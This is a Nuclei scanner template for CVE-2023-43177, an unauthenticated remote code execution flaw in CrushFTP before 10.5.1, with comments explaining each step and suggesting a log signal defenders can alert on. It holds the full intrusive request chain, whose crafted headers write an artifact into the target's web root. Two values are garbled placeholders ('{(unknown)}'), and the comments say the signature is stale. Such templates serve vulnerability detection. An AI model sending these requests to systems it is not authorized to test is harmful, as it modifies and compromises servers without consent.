# Nuclei template for CVE-2023-43177 (CrushFTP < 10.5.1).
# Three-step flow: (1) read the CrushFTP cookie names from /WebInterface,
# (2) POST to the getUsername command with as2-to and user_* headers,
# (3) GET the path named in step 2 and look for the marker value.
# Tagged `intrusive`: step 3 only succeeds if step 2 left a directory/file
# under WebInterface/ on the target, so expect that artifact to remain
# after a scan.
id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
    - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.00106
    epss-percentile: 0.42667
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
  tags: cve,cve2023,crushftp,unauth,rce,intrusive

# All three requests must match, in order, for the template to report a hit.
flow: http(1) && http(2) && http(3)

# Random per-run names: the on-target artifact path differs between scans,
# so do not expect a fixed directory name when hunting for leftovers.
variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  # Step 1: the response headers must mention both cookie names; their
  # values (http_1_currentauth / http_1_crushauth) feed steps 2 and 3.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"
    matchers:
      - type: dsl
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  # Step 2: the intrusive request. From the defender's side, a POST to
  # function/?command=getUsername carrying as2-to together with user_*
  # request headers is the signal worth alerting on in web-server logs.
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      user_log_path: "./WebInterface/{{dirname}}/"
      # NOTE(review): value exactly as found in the source; presumably a
      # template variable that did not survive extraction — left unchanged.
      user_log_file: "{(unknown)}"
      Content-Type: application/x-www-form-urlencoded
    body: |
      post=body
    matchers:
      - type: regex
        regex:
          - "crushadmin"

  # Step 3: confirm the artifact from step 2 is now served from the web root
  # and contains the marker built from the random dirname.
  - method: GET
    path:
      # NOTE(review): trailing path segment exactly as found in the source;
      # left unchanged.
      - "{{BaseURL}}/WebInterface/{{dirname}}/{(unknown)}"
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and

# Template signature line. The body above has been re-flowed from a
# single-line extraction, so this stored digest presumably no longer
# matches the content until the template is re-signed.
# digest: 4a0a00473045022100d913354a9c93a89ba357bc9d81307fe0e0a7f3c90860307993cbc66f5eda4e310220240033f4cf45f26955c06a3db3b76e0532cc88ee2e3a32118e5ffc09cfeefb0b:922c64590222798bb761d5b6d8e72950